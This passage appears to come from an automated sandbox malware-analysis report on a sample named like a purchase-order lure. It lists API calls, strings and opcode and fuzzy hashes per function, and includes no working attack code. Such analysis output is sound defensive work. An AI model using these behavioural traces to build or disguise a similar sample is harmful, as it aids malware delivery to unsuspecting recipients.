                                                                                                                                                                                                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                                                                                      • String ID: 5K
                                                                                                                                                                                                      • API String ID: 1433390588-2802765362
                                                                                                                                                                                                      • Opcode ID: 6872b4b3d6b3d34319df9a50e78a3afd508431f81b654905c2b9f4d6c5d1579e
                                                                                                                                                                                                      • Instruction ID: d697a1fa8781da38c78068c46b0b6ff43c18bd23b22d0c88ecb10fbe5a78bbdf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6872b4b3d6b3d34319df9a50e78a3afd508431f81b654905c2b9f4d6c5d1579e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3731CA7190221AAFEB10AF61DD55EBFBBA8FF09340F018826F901D2151D738D911D779
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,004736F4,00000010,?,Bad directive syntax error,0049DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 004425D6
                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,004736F4,00000010), ref: 004425DD
                                                                                                                                                                                                      • _wprintf.LIBCMT ref: 00442610
                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00442632
                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 004426A1
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                                                                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                      • API String ID: 1080873982-4153970271
                                                                                                                                                                                                      • Opcode ID: 06c835ffc423fd4cd24cf5a6242f0bca31f584911adb7397c99b10d12447e64d
                                                                                                                                                                                                      • Instruction ID: 6e45d18c7c245d819c2143957a2fa29815b484cd66ec6b662217039c2da16d9e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06c835ffc423fd4cd24cf5a6242f0bca31f584911adb7397c99b10d12447e64d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F215E3190021ABBCF11AF91DC4AFEE7735BF18308F40046AF505760A2EA79AA15DB68
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • timeGetTime.WINMM ref: 00447794
                                                                                                                                                                                                        • Part of subcall function 0041DC38: timeGetTime.WINMM(?,75A8B400,004758AB), ref: 0041DC3C
                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 004477C0
                                                                                                                                                                                                      • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 004477E4
                                                                                                                                                                                                      • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00447806
                                                                                                                                                                                                      • SetActiveWindow.USER32 ref: 00447825
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00447833
                                                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00447852
                                                                                                                                                                                                      • Sleep.KERNEL32(000000FA), ref: 0044785D
                                                                                                                                                                                                      • IsWindow.USER32 ref: 00447869
                                                                                                                                                                                                      • EndDialog.USER32(00000000), ref: 0044787A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                      • String ID: BUTTON
                                                                                                                                                                                                      • API String ID: 1194449130-3405671355
                                                                                                                                                                                                      • Opcode ID: fc4ab62694c49ec1099aeb68e51c4f0e646b245e142f7d642acf0be79513975a
                                                                                                                                                                                                      • Instruction ID: 3f3377c3b03e6d66edf864826632aa4226d8703482a69eaeed50c8e58cd4201f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc4ab62694c49ec1099aeb68e51c4f0e646b245e142f7d642acf0be79513975a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF215370605645AFF7016F20EC89F6A3F29FB44349B00483AF905812B2DB6D5C06DB6D
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
                                                                                                                                                                                                        • Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF
                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0045034B
                                                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 004503DE
                                                                                                                                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 004503F2
                                                                                                                                                                                                      • CoCreateInstance.OLE32(0048DA8C,00000000,00000001,004B3CF8,?), ref: 0045043E
                                                                                                                                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 004504AD
                                                                                                                                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 00450505
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00450542
                                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0045057E
                                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 004505A1
                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 004505A8
                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 004505DF
                                                                                                                                                                                                      • CoUninitialize.OLE32(00000001,00000000), ref: 004505E1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1246142700-0
                                                                                                                                                                                                      • Opcode ID: b29a6f989df6d380b34fc3c21809466ccc5bc947e8d003b8f2bc98bc42ab0799
                                                                                                                                                                                                      • Instruction ID: 3586f6fd98b86659115b9bfb8829d1e59e8e8623d16e807983909ebb0081da27
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b29a6f989df6d380b34fc3c21809466ccc5bc947e8d003b8f2bc98bc42ab0799
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0DB1FA75A00109AFDB04DFA5C888DAEBBB9FF48305B1484AAF905EB251DB34ED45CF54
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 00442ED6
                                                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 00442F41
                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00442F61
                                                                                                                                                                                                      • GetKeyState.USER32(000000A0), ref: 00442F78
                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00442FA7
                                                                                                                                                                                                      • GetKeyState.USER32(000000A1), ref: 00442FB8
                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00442FE4
                                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 00442FF2
                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 0044301B
                                                                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 00443029
                                                                                                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00443052
                                                                                                                                                                                                      • GetKeyState.USER32(0000005B), ref: 00443060
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 541375521-0
                                                                                                                                                                                                      • Opcode ID: 83d05710d7bc35541dbc9f2eed5bfe7989f5dcf0168877b9afbe318fe6ee6b74
                                                                                                                                                                                                      • Instruction ID: 9c45705a8db000e6a4ee7a8628f9c376aea548831c4a3dd55c4c2afd4bab552e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83d05710d7bc35541dbc9f2eed5bfe7989f5dcf0168877b9afbe318fe6ee6b74
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39512860A0478429FB35DFA089007EBBFF45F11744F88459FD5C2562C2DA9CAB8CC76A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 0043ED1E
                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0043ED30
                                                                                                                                                                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0043ED8E
                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 0043ED99
                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0043EDAB
                                                                                                                                                                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0043EE01
                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0043EE0F
                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0043EE20
                                                                                                                                                                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0043EE63
                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 0043EE71
                                                                                                                                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0043EE8E
                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0043EE9B
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3096461208-0
                                                                                                                                                                                                      • Opcode ID: b465c413cca5253bdedd3256ff6a12ecff45f755c229ed3141aa91a502673eff
                                                                                                                                                                                                      • Instruction ID: 00737507538eb1ccc85ebbe3006c59c153ea565c734b707143fa93c06e9301c0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b465c413cca5253bdedd3256ff6a12ecff45f755c229ed3141aa91a502673eff
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D512171B01209AFDB18DF69CD85AAEBBBAEB88310F14852DF519E72D0E7749D008B14
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0041B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0041B759,?,00000000,?,?,?,?,0041B72B,00000000,?), ref: 0041BA58
                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0041B72B), ref: 0041B7F6
                                                                                                                                                                                                      • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0041B72B,00000000,?,?,0041B2EF,?,?), ref: 0041B88D
                                                                                                                                                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 0047D8A6
                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0041B72B,00000000,?,?,0041B2EF,?,?), ref: 0047D8D7
                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0041B72B,00000000,?,?,0041B2EF,?,?), ref: 0047D8EE
                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0041B72B,00000000,?,?,0041B2EF,?,?), ref: 0047D90A
                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0047D91C
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 641708696-0
                                                                                                                                                                                                      • Opcode ID: cc5009a6664bfdf172fa232ae460902a89c38e792acc26aefb42bef20774d501
                                                                                                                                                                                                      • Instruction ID: aeda5f4c58aedfe1ab235c20283fe4d5ea771f7082be7751d6cf8c6703a47079
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc5009a6664bfdf172fa232ae460902a89c38e792acc26aefb42bef20774d501
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7961AB70A01600CFDB26AF15DD88BAAB7B5FF85715F14452FE04686AB0C738A8D1DB8D
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0041B526: GetWindowLongW.USER32(?,000000EB), ref: 0041B537
                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0041B438
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ColorLongWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 259745315-0
                                                                                                                                                                                                      • Opcode ID: e868dbce59ca00f1a870f8d48a8e8e3763aace955db75823c8fdb3b889784903
                                                                                                                                                                                                      • Instruction ID: 9056983834b32c36ed4150570584b1c03209aeafd6b8b45defaf711a91559013
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e868dbce59ca00f1a870f8d48a8e8e3763aace955db75823c8fdb3b889784903
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3041C530541100AFDF216F68DC89BFA3766EF46730F148666FDA58A2E6C7348C81C769
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 136442275-0
                                                                                                                                                                                                      • Opcode ID: d61e9edc43eb21dc305860e20555fab4e9811c7e7a0782106bb1dba9aa94a74c
                                                                                                                                                                                                      • Instruction ID: 005bd8409d3bb68de46a5ddcaf555a5972e9497e9b379132242b511ffcb9ea52
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d61e9edc43eb21dc305860e20555fab4e9811c7e7a0782106bb1dba9aa94a74c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C417EB694512CAFDF61EB91DC85DCB73BCEB44300F4001A7F649A2051EA74ABE88F59
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharLowerBuffW.USER32(0049DC00,0049DC00,0049DC00), ref: 0044D7CE
                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?,004B3A70,00000061), ref: 0044D898
                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 0044D8C2
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                                                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                      • API String ID: 2820617543-1000479233
                                                                                                                                                                                                      • Opcode ID: 05a03708d9273325090b6b30521337a4353a8d21da9606f810c1ad8ee856c399
                                                                                                                                                                                                      • Instruction ID: 6215e8b66333fdb673da60b32a2a8998b562a6f15a09a5f6086e7d3bbaedb77f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05a03708d9273325090b6b30521337a4353a8d21da9606f810c1ad8ee856c399
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB51F734504301AFD700EF15DC91AAFB7A5EF84318F20882FF8A957292EB38DD45CA4A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 004093AB
                                                                                                                                                                                                      • __itow.LIBCMT ref: 004093DF
                                                                                                                                                                                                        • Part of subcall function 00421557: _xtow@16.LIBCMT ref: 00421578
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __itow__swprintf_xtow@16
                                                                                                                                                                                                      • String ID: %.15g$0x%p$False$True
                                                                                                                                                                                                      • API String ID: 1502193981-2263619337
                                                                                                                                                                                                      • Opcode ID: 207c6abc436d26d0a3691c9157cab4cc8e8e9b0395153aeb665da96316a453a2
                                                                                                                                                                                                      • Instruction ID: 0ed78e77f9698b809d02e899a200000ec7101b462ac89f610c664c3257f1291c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 207c6abc436d26d0a3691c9157cab4cc8e8e9b0395153aeb665da96316a453a2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A41C571600204AFDB249F75D941EBA73E4EB88304F20447FE549D72D2EB39AD42CB59
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0046A259
                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 0046A260
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0046A273
                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0046A27B
                                                                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0046A286
                                                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 0046A28F
                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0046A299
                                                                                                                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0046A2AD
                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0046A2B9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
